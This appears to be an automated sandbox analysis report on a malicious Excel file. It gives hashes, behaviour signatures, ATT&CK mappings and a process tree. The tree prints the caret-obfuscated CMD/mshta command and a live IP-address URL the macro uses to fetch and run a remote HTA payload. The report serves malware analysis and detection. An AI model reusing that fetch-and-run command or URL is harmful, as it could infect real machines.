Analysis

  • max time kernel
    55s
  • max time network
    25s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 02:22

General

  • Target

    2022-1-28-9289222ae3a0a0703e61bb7b927d26ac.xls

  • Size

    47KB

  • MD5

    9289222ae3a0a0703e61bb7b927d26ac

  • SHA1

    702b916fa5df54f5059e03892b42025aa7bd52db

  • SHA256

    383cee15ce411b5ef9d31aef9f14e842e6f2c2bca3ecef142cfd77488d8dfeb9

  • SHA512

    452a0018a74026904fcde0d6c29c160aa8e411cb374c951b2e040bd95adcddf565732dad2ce6808538af417978eb57b204d0cefd4ab3d260e075a2f53568bb71

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/vvv/ppp/fe.html

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\2022-1-28-9289222ae3a0a0703e61bb7b927d26ac.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:748
    • C:\Windows\SYSTEM32\CMD.EXE
      CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2624
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/vvv/ppp/fe.html
        3⤵
        • Blocklisted process makes network request
        PID:3020
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 3020 -s 1652
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3764

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/748-115-0x00007FFB38F60000-0x00007FFB38F70000-memory.dmp
    Filesize

    64KB

  • memory/748-116-0x00007FFB38F60000-0x00007FFB38F70000-memory.dmp
    Filesize

    64KB

  • memory/748-117-0x00007FFB38F60000-0x00007FFB38F70000-memory.dmp
    Filesize

    64KB

  • memory/748-118-0x00007FFB38F60000-0x00007FFB38F70000-memory.dmp
    Filesize

    64KB

  • memory/748-119-0x00007FFB38F60000-0x00007FFB38F70000-memory.dmp
    Filesize

    64KB

  • memory/748-128-0x00007FFB36410000-0x00007FFB36420000-memory.dmp
    Filesize

    64KB

  • memory/748-129-0x00007FFB36410000-0x00007FFB36420000-memory.dmp
    Filesize

    64KB